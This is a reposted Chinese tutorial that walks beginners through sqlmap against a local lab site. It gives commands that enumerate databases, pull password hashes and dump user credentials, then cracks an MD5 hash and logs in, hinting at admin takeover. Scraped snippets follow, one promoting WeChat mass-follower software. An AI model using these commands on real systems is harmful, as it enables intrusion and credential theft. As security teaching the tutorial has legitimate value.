sqlmap小白操作

转载地儿:http://blog.csdn.net/zgyulongfei/article/details/41017493

对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。

sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。

既然本文是基础教程,以下只写工具的基本使用方法。

本教程为sqlmap具体应用案例,如需了解更多sqlmap资料可以访问官方http://sqlmap.org ,或者乌云知识库http://drops.wooyun.org/tips/401 和 http://drops.wooyun.org/tips/143 。

测试环境:本地搭建的具有sql注入点的网站 http://192.168.1.150

注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。

教程开始:

一、检测注入点是否可用

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

参数:

-u:指定注入点url

结果:

注入结果展示:

(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。

(2)web服务器系统为windows 2003 or XP

(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0

(4)数据库类型为:SQLSERVER 2000

其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch

二、暴库

一条命令即可曝出该sqlserver中所有数据库名称,命令如下:

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs

参数:

--dbs:dbs前面有两条杠,请看清楚。

结果:

结果显示该sqlserver中共包含7个可用的数据库。

三、web当前使用的数据库

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db

四、web数据库使用账户

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user

五、列出sqlserver所有用户

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users

六、数据库账户与密码

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords

七、列出数据库中的表

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables

参数:

-D:指定数据库名称

--tables:列出表

结果:

结果体现共列出了34张表。

八、列出表中字段

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns

参数:

-D:指定数据库名称

-T:指定要列出字段的表

--columns:指定列出字段

结果:

结果显示该userb表中包含了23条字段。

九、暴字段内容

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump

参数:

-C :指定要暴的字段

--dump:将结果导出

结果:

如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:

[plain] view plain copy

  1. C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump

参数:

--start:指定开始的行

--stop:指定结束的行

此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。

结果如下:

十、验证结果

通过上图结果看到其中的一个用户信息为:

email:[email protected]

username: 1.asp

password: 49ba59abbe56e057

通过md5解密,得到该hash的原文密码为:123456

拿到账号密码我们来测试是否可以登录,登录结果如下:

验证成功!

当然我们只是拿到普通会员账号进行登录,你也可以拿到管理员账号进行登录,后面的事情自己发挥吧,嘿嘿!

时间: 2024-08-29 22:49:42

sqlmap小白操作的相关文章

对小白操作Linux系统,解决报错的大概思路

有时候,看到报错,就马上到百度报错的原因,然后又报错,又到百度报错的原因 弄着弄着就不知道自己找的答案是解决之前哪个问题的了. 好,介绍一下linux各种报错的解决的大概思路,以加快我们的学习,工作效率 用纸记下: 报错的提示 解决报错的命令 报错的提示 解决报错的命令 如果一个报错在网上有多种解决报错的方法,可以以流程图分支形式几下来. 原文地址:https://www.cnblogs.com/yongshenwu/p/11785875.html

渗透测试工具sqlmap基础教程

本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过. > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能.然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门. sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞.它由python语言开发而成,因此运行需要安装python环境. 既然本文是基础教程,以下只写工具的基本使用方法. 本教程为sqlmap具体应用案例,如需了解更多sqlmap

Linux系统chmod 777 误操作目录权限 - 恢复方法

小白操作Linux,手抖导致误修改了系统文件和目录权限,导致系统宕机的修复. chmod 777 -R / chmod 777 -R / test 有的是真不懂,执行了上面的第一条命令,有的是懂,但是操作太快或者粗心大意,或者有乱敲空格的恶习,诸如此类... 不胜枚举,总之闯祸了. Linux 中,如果意外误操作将根目录目录权限批量设置,比如 chmod -R 777 / ,系统中的大部分服务以及命令将无法使用,这时候可以通过系统自带的 getfacl 命令来拷贝和还原系统权限,若是其他系统目录

店铺淘客如何做到单店利润过万的个人实战技巧

大家都对店铺淘客挺感兴趣的吧,所以我就分享一些细节,还有如何批量化操作的,平时比较忙,所以之前早就说写文章的,现在才来写.还有其中有很多也是商业机密,大家也都不愿意分享.这次我是毫无保留的分享给大家了.说的都是实操经验,所以对没有操做过这个项的听起来或许有难度,但是对准备入行,或者已经在操作的朋友至少少让大家摸索两个月的时间,好了也就不废话多说了吧. 先来简单介绍一下店铺淘客是怎么操作的 首先我们需要开一个淘宝店铺,然后用我们的的采集上货软件,最后只用坐等成交,坐等收成就可以,简单说一下大家也许

javaEE基础

1.拦截器与过滤器 过滤器(filter),过滤器处于客户端与Web资源(Servlet.JSP.HTML)之间,客户端与Web资源之间的请求和响应都要通过过滤器进行过滤.如过滤编码,IP 拦截器(interceptor),拦截器是一种面向方面/切面编程(AOP Aspect-Oriented Programming),而面向切面就是将多个模块的的通用服务进行分离,如权限管理.日志服务,他们在多个模块中都会用到,就可以将其各自封装为一个可重用模块. 执行顺序 :过滤前 - 拦截前 - Actio

sql 真的很不安全啊

版权声明:本文为博主原创文章,未经博主允许不得转载. 目录(?)[+] 转载请注明出处:http://blog.csdn.NET/zgyulongfei/article/details/41017493 作者:羽龍飛 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过. > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能.然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门. sqlmap是一款非常强大的开源sql自动化

斗鱼扩展--localStorage备份与导出(九)

之前我们都把数据 放在了 localStorage 里,但扩展一旦卸载,数据就会被清空, 在Console里备份,一次只能输出一条,小白操作起来很不方便,所以能不能 导入,导出文件来进行备份还原呢? 这里的用到FileReader 这个类,还有一个FileSaver.js ,开源的网上能下载到. 导入导出 核心代码如下 1 <!DOCTYPE html> 2 <html> 3 <head> 4 <title></title> 5 </hea

【无极圈】微信WXID爆粉PC协议软件,一个让你微信精准加粉到怀疑人生的软件

微信WXID爆粉PC协议软件,一个让你微信精准加粉到怀疑人生的软件 - 无极圈浅颜宸 - 无极圈颜汐从一个程序员的角度详细的介绍一下市面上比较常见的爆粉软件,他们的玩法.优劣势等,不是来做营销的. 一.爆粉协议软件的历史由来 首先给大家介绍下什么是Wxid,V1V2数据. 差不多从2017年七月份开始,市面上各种爆粉软件层出不穷.爆粉又分为采集与添加两个步骤:1.采集:这类的定位采集或者采集转化软件,都是通过Ipad端服务器采集的.2.添加:多数是易语言程序编写的PC端协议.一般协议的存活期都是

微信公众号开发--接入

微信公众号开发 微信开发者工具:https://developers.weixin.qq.com/miniprogram/dev/devtools/download.html 需要绑定开发者账号:微信公众平台--开发者工具--web开发者工具--绑定开发者微信号 微信公众平台接口调试工具:https://mp.weixin.qq.com/debug/ 接口调试需要使用"access_token",access_token的获取需要从在基本设置中的url访问获取,其他终端基本无法获取 1